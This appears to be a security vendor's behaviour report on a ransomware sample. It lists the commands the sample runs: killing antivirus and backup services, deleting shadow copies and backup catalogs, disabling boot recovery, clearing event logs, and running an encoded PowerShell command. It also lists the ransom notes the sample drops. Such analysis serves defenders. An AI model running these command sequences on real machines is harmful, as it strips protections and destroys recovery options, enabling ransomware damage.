Technical Information
Malicious functions
To complicate detection of its presence in the operating system,
deletes volume shadow copies.
Executes the following
- '%WINDIR%\syswow64\net.exe' stop Tmccst /y
- '%WINDIR%\syswow64\taskkill.exe' /f /im KasperskyService.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im SupportConnector.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im NortonSecurity.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im powerpnt.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im vastsvc.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im McAfeeFramework.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im PccNTMon.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im ResponseService.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im avgsvc.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im CETASvc.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im AOTAgent.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im iVPAgent.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im tmwscsvc.exe
- '%WINDIR%\syswow64\net.exe' stop Web Service Communicator /y
- '%WINDIR%\syswow64\net.exe' stop Tmlisten /y
- '%WINDIR%\syswow64\net.exe' stop BackupExecAgentBrowser /y
- '%WINDIR%\syswow64\net.exe' stop TMBMServer /y
- '%WINDIR%\syswow64\net.exe' stop TMResponse /y
- '%WINDIR%\syswow64\net.exe' stop TmWSCSvc /y
- '%WINDIR%\syswow64\net.exe' stop AOTAgentSvc /y
- '%WINDIR%\syswow64\net.exe' stop iVPAgent /y
- '%WINDIR%\syswow64\net.exe' stop Avast Antivirus! /y
- '%WINDIR%\syswow64\net.exe' stop Trend Micro /y
- '%WINDIR%\syswow64\taskkill.exe' /f /im SophosSAU.exe
- '%WINDIR%\syswow64\net.exe' stop Ntrtscan /y
Launches a large number of processes
Modifies file system
Creates the following files
- C:\msocache\readme_to_decrypt.txt
- C:\msocache\all users\{90140000-0115-0409-1000-0000000ff1ce}-c\1033\readme_to_decrypt.txt
- C:\msocache\all users\{90140000-0115-0409-1000-0000000ff1ce}-c\readme_to_decrypt.txt
- C:\msocache\all users\{90140000-00ba-0409-1000-0000000ff1ce}-c\readme_to_decrypt.txt
- C:\msocache\all users\{90140000-00a1-0409-1000-0000000ff1ce}-c\readme_to_decrypt.txt
- C:\msocache\all users\{90140000-0044-0409-1000-0000000ff1ce}-c\readme_to_decrypt.txt
- C:\msocache\all users\{90140000-0043-0409-1000-0000000ff1ce}-c\readme_to_decrypt.txt
- C:\msocache\all users\{90140000-002c-0409-1000-0000000ff1ce}-c\proof.fr\readme_to_decrypt.txt
- C:\msocache\all users\{90140000-002c-0409-1000-0000000ff1ce}-c\proof.es\readme_to_decrypt.txt
- C:\msocache\all users\{90140000-002c-0409-1000-0000000ff1ce}-c\proof.en\readme_to_decrypt.txt
- C:\msocache\all users\{90140000-002c-0409-1000-0000000ff1ce}-c\readme_to_decrypt.txt
- C:\msocache\all users\{90140000-001b-0409-1000-0000000ff1ce}-c\readme_to_decrypt.txt
- C:\msocache\all users\{90140000-001a-0409-1000-0000000ff1ce}-c\readme_to_decrypt.txt
- C:\msocache\all users\{90140000-0019-0409-1000-0000000ff1ce}-c\readme_to_decrypt.txt
- C:\msocache\all users\{90140000-0018-0409-1000-0000000ff1ce}-c\readme_to_decrypt.txt
- C:\msocache\all users\{90140000-0016-0409-1000-0000000ff1ce}-c\readme_to_decrypt.txt
- C:\msocache\all users\{90140000-0011-0000-1000-0000000ff1ce}-c\readme_to_decrypt.txt
- C:\msocache\all users\readme_to_decrypt.txt
- C:\msocache\all users\{90140000-0117-0409-1000-0000000ff1ce}-c\readme_to_decrypt.txt
- C:\msocache\all users\{90140000-0117-0409-1000-0000000ff1ce}-c\access.en-us\readme_to_decrypt.txt
Modifies the following files
- C:\msocache\all users\{90140000-0011-0000-1000-0000000ff1ce}-c\office32ww.xml
- C:\msocache\all users\{90140000-002c-0409-1000-0000000ff1ce}-c\proofing.xml
- C:\msocache\all users\{90140000-002c-0409-1000-0000000ff1ce}-c\proof.fr\proof.cab
- C:\msocache\all users\{90140000-002c-0409-1000-0000000ff1ce}-c\proof.es\proof.xml
- C:\msocache\all users\{90140000-002c-0409-1000-0000000ff1ce}-c\proof.es\proof.cab
- C:\msocache\all users\{90140000-002c-0409-1000-0000000ff1ce}-c\proof.en\proof.cab
- C:\msocache\all users\{90140000-002c-0409-1000-0000000ff1ce}-c\proof.en\proof.xml
- C:\msocache\all users\{90140000-001b-0409-1000-0000000ff1ce}-c\wordlr.cab
- C:\msocache\all users\{90140000-001b-0409-1000-0000000ff1ce}-c\wordmui.xml
- C:\msocache\all users\{90140000-001b-0409-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-001a-0409-1000-0000000ff1ce}-c\outlklr.cab
- C:\msocache\all users\{90140000-001a-0409-1000-0000000ff1ce}-c\outlookmui.xml
- C:\msocache\all users\{90140000-001a-0409-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-0019-0409-1000-0000000ff1ce}-c\publishermui.xml
- C:\msocache\all users\{90140000-0019-0409-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-0019-0409-1000-0000000ff1ce}-c\publr.cab
- C:\msocache\all users\{90140000-0018-0409-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-0018-0409-1000-0000000ff1ce}-c\powerpointmui.xml
- C:\msocache\all users\{90140000-0018-0409-1000-0000000ff1ce}-c\pptlr.cab
- C:\msocache\all users\{90140000-0016-0409-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-0016-0409-1000-0000000ff1ce}-c\excellr.cab
- C:\msocache\all users\{90140000-0016-0409-1000-0000000ff1ce}-c\excelmui.xml
- C:\msocache\all users\{90140000-0011-0000-1000-0000000ff1ce}-c\pkeyconfig-office.xrm-ms
- C:\msocache\all users\{90140000-0011-0000-1000-0000000ff1ce}-c\propsww.cab
- C:\msocache\all users\{90140000-0011-0000-1000-0000000ff1ce}-c\propsww2.cab
- C:\msocache\all users\{90140000-0011-0000-1000-0000000ff1ce}-c\owow32ww.cab
- C:\msocache\all users\{90140000-0011-0000-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-0011-0000-1000-0000000ff1ce}-c\proplusww.xml
- C:\msocache\all users\{90140000-002c-0409-1000-0000000ff1ce}-c\proof.fr\proof.xml
- C:\msocache\all users\{90140000-002c-0409-1000-0000000ff1ce}-c\setup.xml
Modifies multiple files.
Miscellaneous
Creates and executes the following
- '%WINDIR%\syswow64\cmd.exe' /c "bcdedit /set {default} recoveryenabled No"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=W: /on=C: /maxsize=401MB"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im KasperskyService.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "powershell.exe -ep bypass -ec CgAoACgAJwBTACcAKwAnAHQAYQByAHQAJwArACcALQBQAHIAbwBjAGUAcwBzACcAKwAnACAALQAnACsAJwBGAGkAbABlAFAAJwArACcAYQB0AGgAIABrAHAAbgBwACcAKwAnAG8AJwArACcAdwAnACsAJwBlAHI...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=A: /on=C: /maxsize=401MB"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "net stop Avast Antivirus! /y"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=R: /on=C: /maxsize=401MB"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=J: /on=C: /maxsize=401MB"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=I: /on=C: /maxsize=401MB"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im iVPAgent.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im ResponseService.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=Z: /on=C: /maxsize=401MB"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im AOTAgent.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=M: /on=C: /maxsize=401MB"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "net stop BackupExecAgentBrowser /y"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=H: /on=C: /maxsize=401MB"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im avgsvc.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im powerpnt.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im NortonSecurity.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "net stop Tmlisten /y"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=V: /on=C: /maxsize=401MB"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "net stop Tmccst /y"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im vastsvc.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "net stop Web Service Communicator /y"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im SupportConnector.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im SophosSAU.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im CETASvc.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=S: /on=C: /maxsize=401MB"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=L: /on=C: /maxsize=401MB"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=B: /on=C: /maxsize=401MB"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "wbadmin delete catalog -quiet"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "wbadmin DELETE SYSTEMSTATEBACKUP"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "net stop AOTAgentSvc /y"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=D: /on=C: /maxsize=401MB"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "wevtutil cl application"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=T: /on=C: /maxsize=401MB"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "net stop TMBMServer /y"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im PccNTMon.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=N: /on=C: /maxsize=401MB"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "net stop TmWSCSvc /y"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "wevtutil cl system"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=Y: /on=C: /maxsize=401MB"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im tmwscsvc.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im McAfeeFramework.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=Q: /on=C: /maxsize=401MB"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=K: /on=C: /maxsize=401MB"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "net stop Ntrtscan /y"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=X: /on=C: /maxsize=401MB"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=E: /on=C: /maxsize=401MB"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=U: /on=C: /maxsize=401MB"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=F: /on=C: /maxsize=401MB"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=O: /on=C: /maxsize=401MB"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=G: /on=C: /maxsize=401MB"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "bcdedit /set {default} bootstatuspolicy ignoreallfailures"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "net stop Trend Micro /y"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin delete shadows /all /quiet"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "wevtutil cl securit"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "net stop TMResponse /y"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "net stop iVPAgent /y"' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\cmd.exe' /c "bcdedit /set {default} recoveryenabled No"
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=L: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=K: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=E: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=F: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=N: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=R: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ep bypass -ec CgAoACgAJwBTACcAKwAnAHQAYQByAHQAJwArACcALQBQAHIAbwBjAGUAcwBzACcAKwAnACAALQAnACsAJwBGAGkAbABlAFAAJwArACcAYQB0AGgAIABrAHAAbgBwACcAKwAnAG8AJwArACcAdwAnACsAJwBlAHIAcwAnACsAJwBoAGUAbA...
- '%WINDIR%\syswow64\wevtutil.exe' cl system
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=O: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=Y: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\wevtutil.exe' cl securit
- '%WINDIR%\syswow64\wevtutil.exe' cl application
- '%WINDIR%\syswow64\cmd.exe' /c "net stop iVPAgent /y"
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=S: /on=C: /maxsize=401MB"
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im SophosSAU.exe"
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im SupportConnector.exe"
- '%WINDIR%\syswow64\cmd.exe' /c "net stop Web Service Communicator /y"
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im vastsvc.exe"
- '%WINDIR%\syswow64\cmd.exe' /c "net stop Tmccst /y"
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=V: /on=C: /maxsize=401MB"
- '%WINDIR%\syswow64\cmd.exe' /c "net stop Tmlisten /y"
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=U: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=I: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=V: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=G: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\net1.exe' stop BackupExecAgentBrowser /y
- '%WINDIR%\syswow64\net1.exe' stop Ntrtscan /y
- '%WINDIR%\syswow64\net1.exe' stop Trend Micro /y
- '%WINDIR%\syswow64\net1.exe' stop Tmlisten /y
- '%WINDIR%\syswow64\net1.exe' stop TMResponse /y
- '%WINDIR%\syswow64\net1.exe' stop iVPAgent /y
- '%WINDIR%\syswow64\net1.exe' stop Avast Antivirus! /y
- '%WINDIR%\syswow64\net1.exe' stop AOTAgentSvc /y
- '%WINDIR%\syswow64\net1.exe' stop TMBMServer /y
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=Z: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=T: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=Q: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=A: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=H: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=W: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=X: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=M: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=S: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=D: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=B: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=C: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=J: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\net1.exe' stop TmWSCSvc /y
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im NortonSecurity.exe"
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im powerpnt.exe"
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im avgsvc.exe"
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=F: /on=C: /maxsize=401MB"
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=U: /on=C: /maxsize=401MB"
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=E: /on=C: /maxsize=401MB"
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=X: /on=C: /maxsize=401MB"
- '%WINDIR%\syswow64\cmd.exe' /c "net stop Ntrtscan /y"
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=K: /on=C: /maxsize=401MB"
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=Q: /on=C: /maxsize=401MB"
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im McAfeeFramework.exe"
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im tmwscsvc.exe"
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=Y: /on=C: /maxsize=401MB"
- '%WINDIR%\syswow64\cmd.exe' /c "wevtutil cl system"
- '%WINDIR%\syswow64\cmd.exe' /c "net stop TmWSCSvc /y"
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=N: /on=C: /maxsize=401MB"
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im PccNTMon.exe"
- '%WINDIR%\syswow64\cmd.exe' /c "net stop TMBMServer /y"
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=T: /on=C: /maxsize=401MB"
- '%WINDIR%\syswow64\cmd.exe' /c "wevtutil cl application"
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=D: /on=C: /maxsize=401MB"
- '%WINDIR%\syswow64\cmd.exe' /c "net stop AOTAgentSvc /y"
- '%WINDIR%\syswow64\cmd.exe' /c "wbadmin DELETE SYSTEMSTATEBACKUP"
- '%WINDIR%\syswow64\cmd.exe' /c "wbadmin delete catalog -quiet"
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=O: /on=C: /maxsize=401MB"
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=G: /on=C: /maxsize=401MB"
- '%WINDIR%\syswow64\cmd.exe' /c "bcdedit /set {default} bootstatuspolicy ignoreallfailures"
- '%WINDIR%\syswow64\cmd.exe' /c "net stop Trend Micro /y"
- '%WINDIR%\syswow64\cmd.exe' /c "net stop BackupExecAgentBrowser /y"
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=M: /on=C: /maxsize=401MB"
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im AOTAgent.exe"
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=Z: /on=C: /maxsize=401MB"
- '%WINDIR%\syswow64\cmd.exe' /c "wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest"
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im ResponseService.exe"
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im iVPAgent.exe"
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=I: /on=C: /maxsize=401MB"
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=J: /on=C: /maxsize=401MB"
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=R: /on=C: /maxsize=401MB"
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=A: /on=C: /maxsize=401MB"
- '%WINDIR%\syswow64\cmd.exe' /c "net stop Avast Antivirus! /y"
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB"
- '%WINDIR%\syswow64\cmd.exe' /c "powershell.exe -ep bypass -ec CgAoACgAJwBTACcAKwAnAHQAYQByAHQAJwArACcALQBQAHIAbwBjAGUAcwBzACcAKwAnACAALQAnACsAJwBGAGkAbABlAFAAJwArACcAYQB0AGgAIABrAHAAbgBwACcAKwAnAG8AJwArACcAdwAnACsAJwBlAHI...
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im KasperskyService.exe"
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=W: /on=C: /maxsize=401MB"
- '%WINDIR%\syswow64\cmd.exe' /c "taskkill /f /im CETASvc.exe"
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=L: /on=C: /maxsize=401MB"
- '%WINDIR%\syswow64\cmd.exe' /c "net stop TMResponse /y"
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=B: /on=C: /maxsize=401MB"
- '%WINDIR%\syswow64\cmd.exe' /c "wevtutil cl securit"
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin delete shadows /all /quiet"
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin resize shadowstorage /for=H: /on=C: /maxsize=401MB"
- '%WINDIR%\syswow64\net1.exe' stop Web Service Communicator /y
